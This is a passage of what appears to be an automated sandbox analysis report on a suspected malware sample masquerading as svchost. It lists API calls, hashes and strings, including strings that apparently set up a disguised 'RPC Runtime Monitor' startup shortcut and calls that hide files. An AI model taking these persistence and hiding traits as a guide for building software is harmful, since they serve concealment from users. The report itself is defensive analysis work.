                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,0041E020,00000008,0041051B,00000000,00000000,?,?,00410B26,00410CE1,?,?,0040E795,?,?,00401568), ref: 00410424
                                      • __lock.LIBCMT ref: 00410458
                                        • Part of subcall function 004126FB: __mtinitlocknum.LIBCMT ref: 00412711
                                        • Part of subcall function 004126FB: __amsg_exit.LIBCMT ref: 0041271D
                                        • Part of subcall function 004126FB: EnterCriticalSection.KERNEL32(00000000,00000000,?,0041045D,0000000D), ref: 00412725
                                      • InterlockedIncrement.KERNEL32(?), ref: 00410465
                                      • __lock.LIBCMT ref: 00410479
                                      • ___addlocaleref.LIBCMT ref: 00410497
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                      • String ID: KERNEL32.DLL
                                      • API String ID: 637971194-2576044830
                                      • Opcode ID: 24babe39312a7ec5cad1da249c5793e667f9701190cf8a0577b2977ea299dcce
                                      • Instruction ID: 7fb989b1ea40e66e3d5707d5b0016f419c3c6570b292f4f1006bf44dac2eb610
                                      • Opcode Fuzzy Hash: 24babe39312a7ec5cad1da249c5793e667f9701190cf8a0577b2977ea299dcce
                                      • Instruction Fuzzy Hash: CB018E71440B00ABD720DF66D905789FBE0BF08328F10890FE599922A1CBF8A9C4CB19
                                      APIs
                                      • __getptd.LIBCMT ref: 00415C45
                                        • Part of subcall function 00410540: __getptd_noexit.LIBCMT ref: 00410543
                                        • Part of subcall function 00410540: __amsg_exit.LIBCMT ref: 00410550
                                      • __getptd.LIBCMT ref: 00415C56
                                      • __getptd.LIBCMT ref: 00415C64
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                      • String ID: MOC$RCC$csm
                                      • API String ID: 803148776-2671469338
                                      • Opcode ID: 120801709588897a0c6d79d438c9f3a1d2f3b9f75944f8f9ce78d84820664cc3
                                      • Instruction ID: 68d6bacec3ee04245c6d6a34250a27a57659d45bc5a15925c67b47308b05fb02
                                      • Opcode Fuzzy Hash: 120801709588897a0c6d79d438c9f3a1d2f3b9f75944f8f9ce78d84820664cc3
                                      • Instruction Fuzzy Hash: 9FE0ED305106049ED710EB65D08ABE93695BB84318F6914A7E41DCB322E77C99D0498A
                                      APIs
                                      • CoInitializeEx.OLE32(00000000,00000000,81C72413,?,?,?,?,004121A0,0041E298,000000FE), ref: 0040D507
                                      • CoCreateInstance.OLE32(0041A230,00000000,00000001,0041A220,?,?,?,?,?,?,?,004121A0,0041E298,000000FE), ref: 0040D535
                                      • GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,?,004121A0,0041E298,000000FE), ref: 0040D593
                                      • _wcsrchr.LIBCMT ref: 0040D5BF
                                      • SetFileAttributesW.KERNEL32(00000000,00000007,?,?,?,?,?,?,004121A0,0041E298,000000FE), ref: 0040D63F
                                      • CoUninitialize.OLE32(?,?,?,?,?,?,004121A0,0041E298,000000FE), ref: 0040D653
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: AttributesFile$CreateInitializeInstanceUninitialize_wcsrchr
                                      • String ID:
                                      • API String ID: 1064171213-0
                                      • Opcode ID: eef740b4e03db4fe411e7ec77539d1af8d09c2b4e0fa0e4161b48866e4711cb2
                                      • Instruction ID: 4845e592d9404c25205a35a8fd2c5cc2ee3bc669e6c60dc710010856fdd0759c
                                      • Opcode Fuzzy Hash: eef740b4e03db4fe411e7ec77539d1af8d09c2b4e0fa0e4161b48866e4711cb2
                                      • Instruction Fuzzy Hash: 41614771A00208AFDB14DF98CC84BEEB7B5BB4C314F148169E509A72A0C778A985CF68
                                      APIs
                                      • __CreateFrameInfo.LIBCMT ref: 00415EF9
                                        • Part of subcall function 00414757: __getptd.LIBCMT ref: 00414765
                                        • Part of subcall function 00414757: __getptd.LIBCMT ref: 00414773
                                      • __getptd.LIBCMT ref: 00415F03
                                        • Part of subcall function 00410540: __getptd_noexit.LIBCMT ref: 00410543
                                        • Part of subcall function 00410540: __amsg_exit.LIBCMT ref: 00410550
                                      • __getptd.LIBCMT ref: 00415F11
                                      • __getptd.LIBCMT ref: 00415F1F
                                      • __getptd.LIBCMT ref: 00415F2A
                                      • _CallCatchBlock2.LIBCMT ref: 00415F50
                                        • Part of subcall function 004147FC: __CallSettingFrame@12.LIBCMT ref: 00414848
                                        • Part of subcall function 00415FF7: __getptd.LIBCMT ref: 00416006
                                        • Part of subcall function 00415FF7: __getptd.LIBCMT ref: 00416014
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                      • String ID:
                                      • API String ID: 1602911419-0
                                      • Opcode ID: 75cd6b2be72964fee2231a7901abf6b3f657a4c76e677a8a22719dcb4cf62958
                                      • Instruction ID: 8ee7e9482143d68d58532e94b41f02c712f5e5267d1978e0f484a2f57dee007e
                                      • Opcode Fuzzy Hash: 75cd6b2be72964fee2231a7901abf6b3f657a4c76e677a8a22719dcb4cf62958
                                      • Instruction Fuzzy Hash: A311EC71D00209EFDB00EFA5D545ADEB7B1FF08318F10806AF814E7251EB7899959F54
                                      APIs
                                      • __getptd.LIBCMT ref: 0040FBA2
                                        • Part of subcall function 00410540: __getptd_noexit.LIBCMT ref: 00410543
                                        • Part of subcall function 00410540: __amsg_exit.LIBCMT ref: 00410550
                                      • __amsg_exit.LIBCMT ref: 0040FBC2
                                      • __lock.LIBCMT ref: 0040FBD2
                                      • InterlockedDecrement.KERNEL32(?), ref: 0040FBEF
                                      • _free.LIBCMT ref: 0040FC02
                                      • InterlockedIncrement.KERNEL32(02402188), ref: 0040FC1A
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                      • String ID:
                                      • API String ID: 3470314060-0
                                      • Opcode ID: 8102f338a71b026d3340659caaf6562a795bcb1d7daf823b2c693a48d857979c
                                      • Instruction ID: 04197ae65fda5c63c56dbd3dc8e75b233e0ac2e231bfe1491633d9689cd981ba
                                      • Opcode Fuzzy Hash: 8102f338a71b026d3340659caaf6562a795bcb1d7daf823b2c693a48d857979c
                                      • Instruction Fuzzy Hash: DF01CB31941626ABD720AB6994067CA77A0BB04714F14403BE804B36D0D77CB98A8FCE
                                      APIs
                                      • _memset.LIBCMT ref: 0040D722
                                      • SHGetFolderPathW.SHELL32(00000000,00000018,00000000,00000000,?), ref: 0040D780
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: FolderPath_memset
                                      • String ID: --run$RPC Runtime Monitor$\rpcmon.lnk
                                      • API String ID: 3318179493-935953821
                                      • Opcode ID: ea8451d6de9b8cfc2627a8931f54f8f4b5e0d66c4685855b03dc7c76c13e24c5
                                      • Instruction ID: 1050105f52961729ecfe266b6ed7309ec72b43aeb9dcbb43f9ef2f744927e597
                                      • Opcode Fuzzy Hash: ea8451d6de9b8cfc2627a8931f54f8f4b5e0d66c4685855b03dc7c76c13e24c5
                                      • Instruction Fuzzy Hash: 5B21EA74D4031CABDB20DFA0DC4ABE973B4AB14304F5045EEE819A72C1E7789A89DF59
                                      APIs
                                      • ___BuildCatchObject.LIBCMT ref: 00416291
                                        • Part of subcall function 004161EC: ___BuildCatchObjectHelper.LIBCMT ref: 00416222
                                      • _UnwindNestedFrames.LIBCMT ref: 004162A8
                                      • ___FrameUnwindToState.LIBCMT ref: 004162B6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                      • String ID: csm$csm
                                      • API String ID: 2163707966-3733052814
                                      • Opcode ID: f066d28ad6022a030d5a4565ed70b1ed185439130c489b07855e4e37ef1b6396
                                      • Instruction ID: 4da0fed9b642d527bb6294f99e7a8c099849be82aa3d1ad59cbd6958426e80c5
                                      • Opcode Fuzzy Hash: f066d28ad6022a030d5a4565ed70b1ed185439130c489b07855e4e37ef1b6396
                                      • Instruction Fuzzy Hash: EB014631400609BBDF126F52CC46EEB3F6AEF48354F01801ABC1814121D77AD9B1DBA8
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _wcschr$CreateDirectoryErrorLast_memset
                                      • String ID:
                                      • API String ID: 772003639-0
                                      • Opcode ID: 1bd9b1a094997a80373a257bff1b81ce494ae0b4b520e45ac5d92f2d47efe142
                                      • Instruction ID: 2d672686d953e9741263a9bf21e8db2c6a89ede790307b3869fa385045096eae
                                      • Opcode Fuzzy Hash: 1bd9b1a094997a80373a257bff1b81ce494ae0b4b520e45ac5d92f2d47efe142
                                      • Instruction Fuzzy Hash: B24173B0900218DBDB24CF65CC85BE97B74AB44300F0089FAE709772C1D6799A9A8F6D
                                      APIs
                                      • _malloc.LIBCMT ref: 00413BD7
                                        • Part of subcall function 00410B93: __FF_MSGBANNER.LIBCMT ref: 00410BAC
                                        • Part of subcall function 00410B93: __NMSG_WRITE.LIBCMT ref: 00410BB3
                                        • Part of subcall function 00410B93: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,0041273F,00000000,00000001,00000000,?,00412686,00000018,0041E0D0,0000000C,00412716), ref: 00410BD8
                                      • _free.LIBCMT ref: 00413BEA
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: AllocateHeap_free_malloc
                                      • String ID:
                                      • API String ID: 1020059152-0
                                      • Opcode ID: 58750f50900bc6b8eccf237a22aa7467fc111bf939f9debebe0a7c729932f5c0
                                      • Instruction ID: 47fafc7281d56cd7232f0f11f7b3e10cd24c1ba3464f88fcbebd715b16cd05de
                                      • Opcode Fuzzy Hash: 58750f50900bc6b8eccf237a22aa7467fc111bf939f9debebe0a7c729932f5c0
                                      • Instruction Fuzzy Hash: 11112733504211ABCB312FB5AC066DB3B989F453A5B20442BF948A6251EEBCDDC1879D
                                      APIs
                                      • __getptd.LIBCMT ref: 00410323
                                        • Part of subcall function 00410540: __getptd_noexit.LIBCMT ref: 00410543
                                        • Part of subcall function 00410540: __amsg_exit.LIBCMT ref: 00410550
                                      • __getptd.LIBCMT ref: 0041033A
                                      • __amsg_exit.LIBCMT ref: 00410348
                                      • __lock.LIBCMT ref: 00410358
                                      • __updatetlocinfoEx_nolock.LIBCMT ref: 0041036C
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
                                      • String ID:
                                      • API String ID: 938513278-0
                                      • Opcode ID: c38316fe705f66c6962230a229fe9f8488d0c73ecf1f61904e97ab22f669a5d2
                                      • Instruction ID: e4933e4f9cff87b6db1e50e91856c3ef302a7f33dd3041806c411e2e618183a8
                                      • Opcode Fuzzy Hash: c38316fe705f66c6962230a229fe9f8488d0c73ecf1f61904e97ab22f669a5d2
                                      • Instruction Fuzzy Hash: D7F0F631940214ABD720FB6699037CE33906F04728F14010FF818E72D2DBFC48C19A5D
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 0040452F
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 00414118
                                        • Part of subcall function 00414103: __CxxThrowException@8.LIBCMT ref: 0041412D
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 0041413E
                                      • std::_Xinvalid_argument.LIBCPMT ref: 00404569
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                      • String ID: invalid string position$string too long
                                      • API String ID: 963545896-4289949731
                                      • Opcode ID: 5160ba7ff5377a9cb06a17ca2cfd2a61ffbdc779ddeee85e3cff34bec9fe69a5
                                      • Instruction ID: 9fc85db481ca541f5af55655987844c855698c76e688db874c41ef445bc3599c
                                      • Opcode Fuzzy Hash: 5160ba7ff5377a9cb06a17ca2cfd2a61ffbdc779ddeee85e3cff34bec9fe69a5
                                      • Instruction Fuzzy Hash: 244176B4A00209EFCB08CF98D5909DEB7F2BF89300F208599E9156B395D735AE41DF99
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __aulldiv__aullrem_memset
                                      • String ID:
                                      • API String ID: 2330243113-0
                                      • Opcode ID: b90c376ba3f7105503b3352ea07b6021fddb11e8e749851934524995626f3684
                                      • Instruction ID: a62dec62c92b60b4c519499498a98483a560beb34225c0dd4930cde99cd07262
                                      • Opcode Fuzzy Hash: b90c376ba3f7105503b3352ea07b6021fddb11e8e749851934524995626f3684
                                      • Instruction Fuzzy Hash: 7B61B3B5E04208EBDF04DFE4C851BEEBBB1AF88304F148069E9057B381D738AA45DB95
                                      APIs
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                      • String ID:
                                      • API String ID: 3016257755-0
                                      • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                      • Instruction ID: 5b5670c111a8cead40a1ffb16e00d74f18a4a9ed4f14907d396a6f9763220556
                                      • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                      • Instruction Fuzzy Hash: 7E117E3200054EFBCF125E85DC418EE3F22BB89354B598456FE2859131D33AC9B2AB85
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _memset
                                      • String ID: d
                                      • API String ID: 2102423945-2564639436
                                      • Opcode ID: b7c60f92a718278782efad47a80a4cb65daf729d49c5f88dcf05c0d2be91b311
                                      • Instruction ID: 98ac9bbf1862fee8dd38477f1cb269d12124be3a97ef54141adb3ea9d1f28a8a
                                      • Opcode Fuzzy Hash: b7c60f92a718278782efad47a80a4cb65daf729d49c5f88dcf05c0d2be91b311
                                      • Instruction Fuzzy Hash: AE711C71A00208AFCB14CF98D980BEEB7B1EF45314F20C5AAE859A7381D735AE55CF45
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 004048FF
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 00414118
                                        • Part of subcall function 00414103: __CxxThrowException@8.LIBCMT ref: 0041412D
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 0041413E
                                        • Part of subcall function 004049F0: std::_Xinvalid_argument.LIBCPMT ref: 00404A40
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw
                                      • String ID: +H@$invalid string position
                                      • API String ID: 963545896-1930875418
                                      • Opcode ID: d382321adfee120d09452f2890cacc4efdf2c4fac2176087f9421e8c9239d9a8
                                      • Instruction ID: 63a32dae344941abd75bf44d8694bd3729833ffbde521e45b6cf845468b15615
                                      • Opcode Fuzzy Hash: d382321adfee120d09452f2890cacc4efdf2c4fac2176087f9421e8c9239d9a8
                                      • Instruction Fuzzy Hash: BB41BEB4E04208EFCB08DF99D59099EB7B2FF89304F208169E9556B395C734AE41DF58
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID: _memset
                                      • String ID: _b@$_b@
                                      • API String ID: 2102423945-1016703337
                                      • Opcode ID: 6e9ae50890244f920a619df30607ce4d0daf837a4732c6453f158db8b8989439
                                      • Instruction ID: d2c120628e0025ae6c47003c0dfc20d879d162270b197ae00e22ec2d328a1bd1
                                      • Opcode Fuzzy Hash: 6e9ae50890244f920a619df30607ce4d0daf837a4732c6453f158db8b8989439
                                      • Instruction Fuzzy Hash: D241FB70D0424ADFCF04CF94C9507BEBBB1BF41309F2581AAD4127B286C379AA65DB95
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136401991.000000000041A000.00000002.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136432768.000000000041F000.00000040.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136469400.0000000000422000.00000080.00000001.01000000.0000000E.sdmp
                                      • Associated: 0000000A.00000002.4136500880.000000000042F000.00000002.00000001.01000000.0000000E.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_400000_svchost.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: p@$p@
                                      • API String ID: 0-369813981
                                      • Opcode ID: 1f9bf732db030eab792c3d8e2b9f28b5dd4216ae02c00d36d35bb9ab03fa372f
                                      • Instruction ID: 66bd6867b88826b1b95dfa9d2ffa6d0f737279d13ab6826bb27aa332bf879093
                                      • Opcode Fuzzy Hash: 1f9bf732db030eab792c3d8e2b9f28b5dd4216ae02c00d36d35bb9ab03fa372f
                                      • Instruction Fuzzy Hash: 5F312F70E0410AABDF04CF95C980ABFB7B5FF98304F10846AE515EB292E734AE51DB95
                                      APIs
                                      • std::_Xinvalid_argument.LIBCPMT ref: 00404B09
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 00414118
                                        • Part of subcall function 00414103: __CxxThrowException@8.LIBCMT ref: 0041412D
                                        • Part of subcall function 00414103: std::exception::exception.LIBCMT ref: 0041413E
                                      • _memmove.LIBCMT ref: 00404B88
                                      Strings
                                      • invalid string position, xrefs: 00404B04
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.4136362139.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000A.00000002.4136333555.0000000000400000.00000002.00000001.01000000.0000000E.sdmp
